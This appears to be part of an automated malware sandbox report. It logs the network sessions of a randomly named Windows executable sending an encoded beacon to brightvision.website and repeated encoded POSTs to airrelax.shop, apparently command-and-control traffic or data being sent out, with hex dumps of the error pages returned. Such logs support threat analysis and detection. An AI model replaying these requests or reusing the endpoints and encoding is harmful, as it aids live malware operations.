                                                                              Jan 11, 2025 09:30:00.703908920 CET1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                                              Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                                              Jan 11, 2025 09:30:00.703918934 CET1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                                              Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                                              Jan 11, 2025 09:30:00.703939915 CET896INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                                              Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                                              Jan 11, 2025 09:30:00.703946114 CET1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                                                                              Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                                                                              Jan 11, 2025 09:30:00.703958035 CET1236INData Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                                                                              Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                                                                              Jan 11, 2025 09:30:00.703983068 CET448INData Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                              Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                                                                              Jan 11, 2025 09:30:00.704091072 CET1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                                                              Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                                                              Jan 11, 2025 09:30:00.704097986 CET1236INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                                              Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"
                                                                              Jan 11, 2025 09:30:00.708813906 CET1236INData Raw: 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31
                                                                              Data Ascii: one;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606


                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                              36          192.168.2.8  50013        203.161.42.73   80                3920  C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              Timestamp                            Bytes transferred  Direction  Data
                                                                              Jan 11, 2025 09:30:02.682724953 CET  384                OUT        GET /gn26/?DzLTc=fgpTVhEuh+HnR3p0lfNLmVuUqPxSLN4hCHlB5YwrT5j1SjgoO/sQ0W1xqV3uB3iqP4rffdiJ/shc0ougvjbd9MI5QldmEc54Vqz3e9231X82gi2igW+4eDd38X27Ejj4Gw==&m8=urJ0WtmP0FPTTB HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.brightvision.website
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Jan 11, 2025 09:30:03.301008940 CET1236INHTTP/1.1 404 Not Found
                                                                              Date: Sat, 11 Jan 2025 08:30:03 GMT
                                                                              Server: Apache
                                                                              Content-Length: 16052
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                              Jan 11, 2025 09:30:03.301019907 CET1236INData Raw: 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34
                                                                              Data Ascii: /linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                                                                              Jan 11, 2025 09:30:03.301026106 CET1236INData Raw: 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34
                                                                              Data Ascii: 79 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;str
                                                                              Jan 11, 2025 09:30:03.301095009 CET1236INData Raw: 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 30 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c
                                                                              Data Ascii: width="100.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /
                                                                              Jan 11, 2025 09:30:03.301103115 CET896INData Raw: 38 2e 36 36 36 33 31 20 31 2e 32 34 39 39 32 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32
                                                                              Data Ascii: 8.66631 1.249922,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000
                                                                              Jan 11, 2025 09:30:03.301131010 CET1236INData Raw: 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e
                                                                              Data Ascii: ke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.6665
                                                                              Jan 11, 2025 09:30:03.301213026 CET224INData Raw: 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e
                                                                              Data Ascii: 021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.9428
                                                                              Jan 11, 2025 09:30:03.301218033 CET1236INData Raw: 32 2c 31 39 2e 35 30 34 37 38 20 2d 32 2e 30 30 33 34 32 39 2c 33 37 2e 31 38 31 35 39 20 2d 33 2e 30 36 34 31 35 34 2c 35 34 2e 38 36 30 33 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69
                                                                              Data Ascii: 2,19.50478 -2.003429,37.18159 -3.064154,54.86032" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541"
                                                                              Jan 11, 2025 09:30:03.301232100 CET224INData Raw: 22 6d 20 37 39 2e 32 35 34 37 38 2c 31 32 34 2e 32 33 32 36 36 20 63 20 2d 35 2e 34 34 30 31 39 32 2c 31 31 2e 35 36 32 35 31 20 2d 31 30 2e 38 38 30 39 35 31 2c 32 33 2e 31 32 36 32 32 20 2d 31 35 2e 38 39 39 36 35 37 2c 33 33 2e 35 36 33 36 38
                                                                              Data Ascii: "m 79.25478,124.23266 c -5.440192,11.56251 -10.880951,23.12622 -15.899657,33.56368 -5.018706,10.43747 -9.614414,19.74672 -11.912808,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,
                                                                              Jan 11, 2025 09:30:03.301609993 CET1236INData Raw: 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a
                                                                              Data Ascii: 34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
                                                                              Jan 11, 2025 09:30:03.306094885 CET1236INData Raw: 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66
                                                                              Data Ascii: 289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.8 | 50014 | 172.67.215.235 | 80 | 3920 | C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:30:08.449534893 CET | 634 | OUT | POST /an34/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Content-Length: 206
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Host: www.airrelax.shop
Origin: http://www.airrelax.shop
Referer: http://www.airrelax.shop/an34/
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Data Raw: 44 7a 4c 54 63 3d 50 50 37 39 49 45 70 43 76 43 46 45 6f 6c 6d 31 78 31 35 74 69 71 6d 53 73 74 7a 71 6a 56 69 37 4a 4d 71 37 39 4d 66 4a 4e 53 75 46 33 37 6d 51 39 47 56 53 61 36 38 36 46 66 66 36 41 6c 51 49 72 6e 42 47 78 6b 69 76 57 47 53 57 69 65 67 38 70 6a 64 6a 4b 30 36 31 50 2b 66 73 52 52 6b 6e 52 54 64 36 55 51 43 6c 56 4d 77 6c 55 69 2b 30 77 70 56 62 39 4a 4b 67 38 7a 44 6c 31 53 57 39 47 64 4c 6b 6e 6c 59 6d 67 49 62 35 6d 68 71 56 6d 63 51 54 36 64 45 64 65 68 4c 54 71 71 6f 42 37 75 70 6b 71 51 75 49 47 6e 7a 79 4d 37 6a 72 47 36 50 38 30 56 73 49 59 57 47 33 36 45 73 58 38 5a 56 78 79 57 49 3d
Data Ascii: DzLTc=PP79IEpCvCFEolm1x15tiqmSstzqjVi7JMq79MfJNSuF37mQ9GVSa686Fff6AlQIrnBGxkivWGSWieg8pjdjK061P+fsRRknRTd6UQClVMwlUi+0wpVb9JKg8zDl1SW9GdLknlYmgIb5mhqVmcQT6dEdehLTqqoB7upkqQuIGnzyM7jrG6P80VsIYWG36EsX8ZVxyWI=
Jan 11, 2025 09:30:09.185920954 CET | 1236 | IN | HTTP/1.1 405 Method Not Allowed
Date: Sat, 11 Jan 2025 08:30:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yG3s8eC3lB%2FgH97rZmBV%2FHOQLC4aR46zayMy2Slaa6qX7Q0mqx15u3y%2BkHeSS3wnT6rO9IF%2BZ3b%2FF28I3cHA8%2Fiwarw93VaCjzfBoDjTgdVNpuwXfpOOjdpbYkZgRqlq7xAFSA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90038b096be3423f-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1670&min_rtt=1670&rtt_var=835&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=634&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to
Jan 11, 2025 09:30:09.185931921 CET | 124 | IN | Data Raw: 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61
Data Ascii: disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.8 | 50015 | 172.67.215.235 | 80 | 3920 | C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:30:10.995969057 CET | 654 | OUT | POST /an34/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Content-Length: 226
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Host: www.airrelax.shop
Origin: http://www.airrelax.shop
Referer: http://www.airrelax.shop/an34/
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Data Raw: 44 7a 4c 54 63 3d 50 50 37 39 49 45 70 43 76 43 46 45 6f 42 61 31 32 6d 52 74 7a 4b 6d 52 31 64 7a 71 71 31 69 2f 4a 4c 69 37 39 49 48 6a 52 77 61 46 32 5a 4f 51 38 45 39 53 5a 36 38 36 52 76 66 37 50 46 51 44 72 6e 4e 4f 78 6b 75 76 57 47 75 57 69 61 6b 38 6f 53 64 6b 4c 6b 36 37 44 65 66 75 63 78 6b 6e 52 54 64 36 55 51 57 50 56 49 55 6c 55 53 75 30 78 4d 35 59 31 70 4b 76 73 6a 44 6c 6b 69 58 56 47 64 4c 57 6e 6b 30 4d 67 4c 76 35 6d 6a 43 56 6f 75 30 63 77 64 46 57 52 42 4b 43 36 5a 4a 56 7a 66 5a 45 68 53 4f 49 49 55 50 4f 4a 4e 53 42 63 59 48 36 33 56 45 6a 59 56 75 42 2f 7a 78 2f 6d 36 46 42 73 42 64 41 79 58 32 6c 33 70 44 46 5a 31 47 2b 52 54 30 6b 63 37 57 79
Data Ascii: DzLTc=PP79IEpCvCFEoBa12mRtzKmR1dzqq1i/JLi79IHjRwaF2ZOQ8E9SZ686Rvf7PFQDrnNOxkuvWGuWiak8oSdkLk67DefucxknRTd6UQWPVIUlUSu0xM5Y1pKvsjDlkiXVGdLWnk0MgLv5mjCVou0cwdFWRBKC6ZJVzfZEhSOIIUPOJNSBcYH63VEjYVuB/zx/m6FBsBdAyX2l3pDFZ1G+RT0kc7Wy
Jan 11, 2025 09:30:11.796701908 CET | 785 | IN | HTTP/1.1 405 Method Not Allowed
Date: Sat, 11 Jan 2025 08:30:11 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oqOETmJocwqpdKcAtUidjAc5TbzmqfJmyiBX86H%2FLQhNyLrvj1ZVbWlgqLrmmmePikGu0pYGrJ3lwo2Dp%2FFPT6QxTdr7OaMQkEc1zXhwpAf8hgi5cgMuZWiHl%2FE6KpIKU%2BMbhA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90038b192ac4c448-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1469&min_rtt=1469&rtt_var=734&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=654&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Jan 11, 2025 09:30:11.796720028 CET | 571 | IN | Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20
Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.8 | 50016 | 172.67.215.235 | 80 | 3920 | C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:30:13.541340113 CET | 1671 | OUT | POST /an34/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Content-Length: 1242
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Host: www.airrelax.shop
Origin: http://www.airrelax.shop
Referer: http://www.airrelax.shop/an34/
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Data Raw: 44 7a 4c 54 63 3d 50 50 37 39 49 45 70 43 76 43 46 45 6f 42 61 31 32 6d 52 74 7a 4b 6d 52 31 64 7a 71 71 31 69 2f 4a 4c 69 37 39 49 48 6a 52 77 43 46 33 71 32 51 39 69 31 53 59 36 38 36 53 76 66 2b 50 46 51 6b 72 6e 56 4b 78 6b 79 5a 57 41 69 57 69 2f 77 38 76 67 6c 6b 53 30 36 37 63 75 66 72 52 52 6b 49 52 54 4e 32 55 51 47 50 56 49 55 6c 55 55 69 30 6e 70 56 59 7a 70 4b 67 38 7a 44 68 31 53 58 75 47 64 44 38 6e 6b 78 35 67 39 66 35 6e 44 79 56 6c 39 51 63 79 39 46 55 57 42 4b 61 36 5a 46 6a 7a 63 39 6d 68 57 48 76 49 55 33 4f 49 37 48 6b 4e 6f 54 31 74 44 41 78 55 31 54 72 68 43 56 72 35 62 4a 48 71 32 4e 6c 36 78 53 4f 68 62 62 51 52 58 6e 68 4f 79 67 5a 55 4c 44 2f 77 2f 36 59 74 4a 55 4c 68 51 4a 35 31 72 58 31 34 5a 4d 31 69 48 61 6c 77 4f 77 41 76 73 55 34 6f 5a 68 4a 64 4f 68 52 38 70 39 6d 74 55 68 48 31 42 2f 53 41 65 36 6b 62 7a 36 65 53 45 52 4c 4a 35 71 2b 63 7a 44 59 79 52 31 7a 5a 2b 51 61 46 45 37 69 34 6c 68 66 64 79 61 68 43 2f 74 46 64 76 6e 66 2b 50 4a 48 67 2b 73 42 38 4d 4e 32 [TRUNCATED]
Data Ascii: DzLTc=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 [TRUNCATED]
Jan 11, 2025 09:30:14.229127884 CET | 786 | IN | HTTP/1.1 405 Method Not Allowed
Date: Sat, 11 Jan 2025 08:30:14 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3xYq3JO4YnPaDZ%2F2SkaxSg8AB7ss55QvdCwRPx%2Fm4wF96irDEWJcZ5%2B9aVEkvWVjhvIZtloMF9sXBdDI0OJ3BZaYgPtQvKA5DkczFgqWmDptS8TeA%2F5JTdhS0oeHepcF0Q9zhw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
